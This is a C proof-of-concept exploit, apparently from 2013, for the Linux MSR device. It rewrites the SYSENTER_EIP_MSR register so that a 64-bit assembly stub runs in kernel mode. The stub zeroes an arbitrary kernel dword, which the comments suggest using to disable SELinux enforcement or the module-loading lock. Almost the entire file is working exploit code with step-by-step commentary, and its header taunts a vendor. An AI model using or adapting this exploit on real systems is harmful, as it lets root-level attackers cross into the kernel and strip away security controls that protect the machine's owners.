// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
// can do whatever in the commented area, re-enable module support, etc
// requires CONFIG_X86_MSR and just uid 0
// a small race exists between the time when the MSR is written to the first
// time and when we issue our sysenter
// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
// configured to take a hex arg of a dword pointer to set to 0
// (modules_disabled, selinux_enforcing, take your pick)
//
// Hello to Red Hat, who has shown yet again to not care until a
// public exploit is released. Not even a bugtraq entry existed in
// their system until this was published -- and they have a paid team
// of how many?
// It's not as if I didn't mention the problem and existence of an easy
// exploit multiple times prior:
//
// spender 2013
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/mman.h>
#define SYSENTER_EIP_MSR 0x176
// Value of SYSENTER_EIP_MSR as read by main() from the msr device before it
// is overwritten; also copied into payload_data[0].
u_int64_t msr;
// Buffer whose address main() loads into ecx before `sysenter`; the stub in
// ring0() copies ecx into esp as its first instruction.
unsigned
long
ourstack[65536];
// Parameter block whose address main() loads into ebx before `sysenter`:
//   [0] = original SYSENTER_EIP_MSR value (written back by the stub)
//   [1] = address of the dword the stub sets to 0 (0 means "skip the write")
// The remaining elements are not used in this file.
u_int64_t payload_data[16];
// Labels emitted by the inline assembly inside ring0(), marking the start and
// end of the stub. They are declared here as `void *` objects, so `&_ring0`
// is the label's address while the bare name `_ring0` evaluates to the
// pointer-sized value stored at that address.
extern
void
*_ring0;
extern
void
*_ring0_end;
/*
 * Container for the stub that main() installs as the SYSENTER entry point.
 *
 * Nothing in this file calls ring0() as a C function. Its inline assembly
 * defines the global labels `_ring0` and `_ring0_end`, and main() writes the
 * address of `_ring0` into SYSENTER_EIP_MSR and then executes `sysenter`.
 *
 * Register contract, as set up by the asm block at the end of main():
 *   ecx = address of `ourstack`
 *   edx = address of `label2` in main()
 *   ebx = address of `payload_data`
 */
void
ring0(
void
)
{
__asm
volatile
(
".globl _ring0\n"
"_ring0:\n"
// The stub is assembled as 64-bit code in Intel syntax, although the
// rest of the file is built as 32-bit code.
".intel_syntax noprefix\n"
".code64\n"
// set up stack pointer with 'ourstack' (its address arrives in ecx)
"mov esp, ecx\n"
// save the registers used below so they can be restored before sysexit
"push rax\n"
"push rbx\n"
"push rcx\n"
"push rdx\n"
// play with the kernel here with interrupts disabled!
// Load payload_data[1]; if it is non-zero, store a 32-bit 0 at that address.
"mov rcx, qword ptr [rbx+8]\n"
"test rcx, rcx\n"
"jz skip_write\n"
"mov dword ptr [rcx], 0\n"
"skip_write:\n"
// restore MSR value before returning:
// ecx selects the MSR, edx:eax is the 64-bit value taken from payload_data[0]
"mov ecx, 0x176\n"
// SYSENTER_EIP_MSR
"mov eax, dword ptr [rbx]\n"
"mov edx, dword ptr [rbx+4]\n"
"wrmsr\n"
// Restore the saved registers: ecx is again the `ourstack` address and
// edx the `label2` address that main() passed in.
"pop rdx\n"
"pop rcx\n"
"pop rbx\n"
"pop rax\n"
// Re-enable interrupts, then return to user mode; sysexit takes the
// user-mode instruction pointer from edx and stack pointer from ecx.
"sti\n"
"sysexit\n"
// Switch the assembler back to the 32-bit AT&T mode used by the rest of
// the compiler-generated output.
".code32\n"
".att_syntax prefix\n"
".global _ring0_end\n"
"_ring0_end:\n"
);
}
// Holds main()'s esp across the `sysenter` round trip: stored immediately
// before `sysenter` and reloaded at `label2` after the stub returns.
unsigned
long
saved_stack;
/*
 * Program entry point.
 *
 * argv[1] (optional) is parsed as a hexadecimal address and stored in
 * payload_data[1]; when absent the value stays 0 and the stub skips its write.
 *
 * Sequence:
 *   1. mlock the stub range and payload_data (return values are not checked).
 *   2. Switch to SCHED_FIFO priority 99 and pin the process to CPU 0.
 *   3. Open the CPU 0 MSR device, read SYSENTER_EIP_MSR and save it.
 *   4. Write the address of the `_ring0` label to SYSENTER_EIP_MSR.
 *   5. Execute `sysenter` with ecx/edx/ebx set up for the stub.
 *
 * Returns 0 after printing "Success."; calls exit(1) with a message on stderr
 * if scheduling, affinity, open, read or write fails.
 */
int
main(
int
argc,
char
*argv[])
{
cpu_set_t set;
int
msr_fd;
int
ret;
u_int64_t new_msr;
struct
sched_param sched;
// Target address for the stub's zeroing write; 0 unless given on the command line.
u_int64_t resolved_addr = 0ULL;
if
(argc == 2)
resolved_addr = strtoull(argv[1], NULL, 16);
// can do this without privilege
// Note: `_ring0` / `_ring0_end` are used here by value as declared
// (`extern void *`), and the results of both mlock() calls are ignored.
mlock(_ring0, (unsigned
long
)_ring0_end - (unsigned
long
)_ring0);
mlock(&payload_data,
sizeof
(payload_data));
// Build a CPU mask containing only CPU 0.
CPU_ZERO(&set);
CPU_SET(0, &set);
// Request SCHED_FIFO at priority 99 for this process (the file header ties
// this to CAP_SYS_NICE and to narrowing the race it describes).
sched.sched_priority = 99;
ret = sched_setscheduler(0, SCHED_FIFO, &sched);
if
(ret) {
fprintf
(stderr,
"Unable to set priority.\n"
);
exit
(1);
}
// Pin to CPU 0 so the process runs on the CPU whose MSR device is opened below.
ret = sched_setaffinity(0,
sizeof
(cpu_set_t), &set);
if
(ret) {
fprintf
(stderr,
"Unable to set affinity.\n"
);
exit
(1);
}
// Open the MSR device for CPU 0, falling back to the alternate device path.
msr_fd = open(
"/dev/cpu/0/msr"
, O_RDWR);
if
(msr_fd < 0) {
msr_fd = open(
"/dev/msr0"
, O_RDWR);
if
(msr_fd < 0) {
fprintf
(stderr,
"Unable to open /dev/cpu/0/msr\n"
);
exit
(1);
}
}
// The file offset selects the MSR number; read the current 64-bit value.
// The lseek() result is not checked.
lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
ret = read(msr_fd, &msr,
sizeof
(msr));
if
(ret !=
sizeof
(msr)) {
fprintf
(stderr,
"Unable to read /dev/cpu/0/msr\n"
);
exit
(1);
}
// stuff some addresses in a buffer whose address we
// pass to the "kernel" via register
payload_data[0] = msr;
payload_data[1] = resolved_addr;
printf
(
"Old SYSENTER_EIP_MSR = %016llx\n"
, msr);
fflush
(stdout);
// Seek back to the same MSR and prepare the replacement value: the address
// of the `_ring0` label, widened to 64 bits.
lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
new_msr = (u_int64_t)(unsigned
long
)&_ring0;
printf
(
"New SYSENTER_EIP_MSR = %016llx\n"
, new_msr);
fflush
(stdout);
ret = write(msr_fd, &new_msr,
sizeof
(new_msr));
if
(ret !=
sizeof
(new_msr)) {
fprintf
(stderr,
"Unable to modify /dev/cpu/0/msr\n"
);
exit
(1);
}
// Enter the stub. esp is saved in `saved_stack`, then the registers the
// stub expects are loaded: ecx = ourstack, edx = label2 (where execution
// resumes after the stub's sysexit), ebx = payload_data. At label2 the
// original esp is restored. The asm statement declares no operands or
// clobbers.
__asm
volatile
(
".intel_syntax noprefix\n"
".code32\n"
"mov saved_stack, esp\n"
"lea ecx, ourstack\n"
"lea edx, label2\n"
"lea ebx, payload_data\n"
"sysenter\n"
"label2:\n"
"mov esp, saved_stack\n"
".att_syntax prefix\n"
);
printf
(
"Success.\n"
);
return
0;
}